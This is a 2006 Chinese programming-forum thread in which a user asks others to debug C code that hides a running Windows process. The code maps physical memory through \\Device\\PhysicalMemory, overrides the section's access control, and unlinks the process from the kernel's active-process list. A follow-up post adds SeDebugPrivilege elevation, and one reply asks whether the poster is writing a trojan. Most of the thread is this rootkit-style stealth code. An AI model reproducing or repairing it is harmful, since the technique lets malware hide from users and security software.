求救:进程隐藏失败,源码分析!

yxandyx 2006-08-31 02:12:25

请大家分析一下,看问题出在哪里,下面是调用隐藏的方法:
BOOL HideProcessAtAll()
{

if (InitNTDLL())
{
if (OpenPhysicalMemory()==0) //问题出在这里,始终返回0.
{

return FALSE;
}
int f,b;
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize=sizeof(osvi);
GetVersionEx(&osvi);
//f=0x88;b=0x8c;

if(osvi.dwMajorVersion==5)
{
if(osvi.dwMinorVersion==0)//win2k
{
f=0xa0;b=0xa4;
}
else if(osvi.dwMinorVersion==1)//winxp
{
f=0x88;b=0x8c;
}
else if(osvi.dwMinorVersion==2)//win2003
{
f=0x8a;b=0x8e;
}
else return FALSE;
}
else if(osvi.dwMajorVersion==4 && osvi.dwMinorVersion==0 &&osvi.dwPlatformId==2)//NT
{
f=0x98;b=0x9c;
}
else return FALSE;

// ULONG thread=GetData((PVOID)0xFFDFF124);
// ULONG process=GetData((PVOID)(thread+0x22c));

LocateNtdllEntry( );
//打开自身句柄,这样才能在handle列表中找到自己,PROCESS 对应 ObjectTypeNum 为5
OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );
ULONG process=(ULONG)GetEprocessFromPid( (DWORD)GetCurrentProcessId() );
ULONG fw=GetData(PVOID(process+f));
ULONG bw=GetData(PVOID(process+b));
SetData(PVOID(fw+4),bw);
SetData(PVOID(bw),fw);

UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
}
return TRUE;
}

//OpenPhysicalMemory() 方法
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;

RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );

attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;

status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);

if(status == STATUS_ACCESS_DENIED){

status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
}

if( !NT_SUCCESS( status ))
{
return NULL;
}

g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4,
0,
0x30000,
0x1000);
if( g_pMapPhysicalMemory == NULL )
{

return NULL;
}

return g_hMPM;
}

...全文

288 6 打赏收藏转发到动态举报

写回复

用AI写文章

6 条回复

切换为时间正序

请发表友善的回复…

发表回复

baojian88888 2006-08-31

打赏
举报

楼主想做木马么

snowbirdfly 2006-08-31

打赏
举报

OpenPhysicalMemory()?
这个是不是你自己写的函数还是系统的函数阿??
if( !NT_SUCCESS( status )) //这里始终返回
问题是 status这个值有没有问题??

折腾_苏州 2006-08-31

打赏
举报

楼主的代码我也有完整的一份，虽然我这边调试
OpenPhysicalMemory 是不为0 的，但最纵还是实现不了隐藏..

yxandyx 2006-08-31

打赏
举报

babyboy(榆木疙瘩) ( ) :我加了一个提升权限的方法

oid EnableDebugPriv( void )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;

if ( ! OpenProcessToken( GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
{

return;
}
if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) ){

CloseHandle( hToken );
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
{

CloseHandle( hToken );
}
}

问题还是依旧:在OpenPhysicalMemory()中的这段返回NULL

在if(status == STATUS_ACCESS_DENIED){

status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
}

if( !NT_SUCCESS( status )) //这里始终返回
{
return NULL;
}

yxandyx 2006-08-31